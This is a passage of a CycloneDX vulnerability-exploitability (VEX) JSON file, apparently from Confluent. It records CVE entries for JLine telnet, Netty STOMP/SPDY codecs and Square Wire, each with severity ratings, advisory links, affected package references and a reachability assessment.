          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NEW-ENVIRON variable-flooding sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-56741",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not apply an upper bound to terminal dimensions received via the Telnet NAWS option, and TelnetIO.handleNAWS() in TelnetIO.java:856-879 reads client-supplied width and height as 16-bit unsigned integers and passes values such as 65535x65535 to setTerminalGeometry(), allowing an unauthenticated remote attacker to repeatedly alternate values and trigger continuous expensive rendering work that causes CPU exhaustion and denial of service. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56741"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/3ea9cad8699714dc072fade29d36be0d1e23d708"
        },
        {
          "url": "https://github.com/jline/jline3/commit/733eb353dca7b0ea0252e724445b6defa29c393e"
        },
        {
          "url": "https://github.com/jline/jline3/commit/86b7ba7801988aadb1a67555629522a71d603bd3"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-2r2c-cx56-8933"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56741"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:17:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.22.0",
          "versions": [
            {
              "version": "3.22.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0bff854c-463d-426b-b9ed-2e6b564da7b9/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NAWS terminal-geometry sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-44891",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.stomp.StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, and the maxLineLength parameter only restricts individual header lines. An attacker can send a large number of short headers that are accumulated in memory inside DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError, causing denial of service for servers exposing a STOMP endpoint based on StompSubframeDecoder. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-stomp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44891"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44891"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-vhch-2wf3-m8rp"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44891"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44891"
        }
      ],
      "published": "2026-07-17T21:17:06+00:00",
      "updated": "2026-07-23T13:35:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#73d99851-e7b6-426d-9ec0-688e03aafcb7"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b1ba5afb-3a3f-434b-984f-ea95aa6666cd"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c6792ca5-17ce-43b5-a307-ad853746941d"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#ecce4967-72b5-484c-bde8-16a72d7fc6c8"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#e3d80e6b-653f-4f9f-8f8e-689777180bdd"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#e91a2a22-e63d-4bd0-86a6-28533f2aa6a2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#b5317d68-c85a-45f5-bd49-e861a6e2f263"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#cf55e37d-3b28-4878-844e-ca11c5419af0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#69505a19-3d2a-4a91-85a5-053ae2eacd72"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#90f126c7-ea6a-43c5-ad18-db95384d4dc8"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#fb523247-755f-4b16-a989-9e3d825125c9"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-45799",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        129
      ],
      "description": "Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.3.0 and 7.0.0-alpha03, ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup() in wire-runtime do not validate that a LENGTH_DELIMITED field length is non-negative before skip(), allowing a crafted protobuf varint encoding -128 as a signed Int to make skip(-128) move the internal position negative and make the next readByte() throw ArrayIndexOutOfBoundsException instead of the documented IOException or ProtocolException, which can crash services using ProtoAdapter.decode(byte[]) on untrusted payloads. This issue is fixed in versions 6.3.0 and 7.0.0-alpha03.",
      "recommendation": "Upgrade com.squareup.wire:wire-runtime-jvm to version 6.3.0, 7.0.0-alpha03",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45799"
        },
        {
          "url": "https://github.com/square/wire"
        },
        {
          "url": "https://github.com/square/wire/commit/47d5b0dba53935d5332cd41a80a353b3fc90e7b0"
        },
        {
          "url": "https://github.com/square/wire/commit/e4e56fab38a547d9625f05c97f1d8f0bcc3a5773"
        },
        {
          "url": "https://github.com/square/wire/pull/3595"
        },
        {
          "url": "https://github.com/square/wire/pull/3597"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/6.3.0"
        },
        {
          "url": "https://github.com/square/wire/releases/tag/7.0.0-alpha03"
        },
        {
          "url": "https://github.com/square/wire/security/advisories/GHSA-7xpr-hc2w-34m9"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45799"
        }
      ],
      "published": "2026-07-17T20:17:18+00:00",
      "updated": "2026-08-12T19:04:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7",
          "versions": [
            {
              "version": "4.9.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:1839f13b-6a18-4e7b-b310-7da0ee6a32ad/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#b3a069bd-f650-47d7-ac84-b27a389ec2a0"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#b0984246-0c6c-4393-8bbf-9e359d4632ab"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f879f1f1-ec9a-41e4-86ad-6b00a7dda6a4"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#ed9035db-80d1-4da2-bd8b-38b600fe3d34"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#cb1fd7b6-3930-432c-959b-879a84a1ec6a"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f0d7a8c1-bdde-474a-9dcf-913bb578df8c"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#d2ee6d4f-03d1-4413-a72e-f803c2ac9f42"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#e28db7f1-791a-468f-8789-cd90b8084ceb"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ea2c726f-1f1e-4913-894d-18c656bac56e"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#fe6f5b1c-898a-4c11-aa69-e81b91792fb0"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#cf5d10b9-1ac9-41d6-af52-099c1b3d5d99"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#c0615a59-d21f-47ef-92fe-9fb3a5c4760e"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:maven/com.squareup.wire/wire-runtime-jvm@4.9.7"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#fe1db1da-51e6-417e-a9c3-d18d9251c820"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-55831",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty's SPDY SETTINGS decoder accepts a peer-declared SETTINGS entry count up to the 24-bit frame-length limit and materializes every unique setting ID in `DefaultSpdySettingsFrame`, allowing a remote SPDY/3.1 peer to send a syntactically valid roughly 2 MiB SETTINGS frame that creates 262144 map entries and amplifies network input into heap growth and ordered-map insertion work. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55831"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55831"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6jqx-86gh-f27w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55831"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55831"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T15:17:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f46bd9c5-bbb4-4905-a7e5-87b2cdfa4b07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#df1f0e67-c2af-4b0a-bc27-0a1d04477689"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#fb09ca96-2de8-4848-83ef-0df6c1b392fe"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#e987c11d-07b4-49db-ab1c-0a2f02c125fe"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#72448050-828a-4fa4-af95-d1e062179c95"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d612726f-976c-49db-8573-9ddb341ea8ba"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#8ce216c4-3956-4ece-9ac2-5db5191ada51"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e89047a4-0a3b-4cfb-88c0-ceca6523232d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55833",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty SPDY header decoding continues inflating zlib-compressed header blocks after the raw header parser has exceeded `maxHeaderSize` and marked the frame truncated in `SpdyFrameCodec`, allowing a remote peer to send a small compressed `HEADERS` block that expands into much larger raw header data and causes compression-amplified CPU and allocation churn. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55833"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55833"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mvh2-crg5-v77c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55833"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55833"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T13:34:45+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#59482894-99d8-4e97-9ad6-82555a5a8f66"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#e9270d8f-ac37-46a9-ba4d-bccbb3434099"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#efded87b-2e1f-45f1-b20f-daf47fabfdd6"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#d664916f-0188-4c6d-976a-a95e5b004984"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#b5155b1d-7e63-430d-9004-8520ee029169"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#c755cc34-3f6d-447c-b113-46440a5e6657"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#b516514f-e0f6-44e9-b5f5-2db4c89a2fa9"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ecd9c6d7-21be-4329-8bd2-64415b7c67e8"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f50d8d8f-9f83-4d24-a8be-069154322809"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fba45fa2-71ff-40da-bbb8-a08bd44cf523"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#bab7766f-9268-4e06-a706-63ef52378b94"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#ffd958be-72a4-4c81-b800-2b6b152841a3"
        },
        {
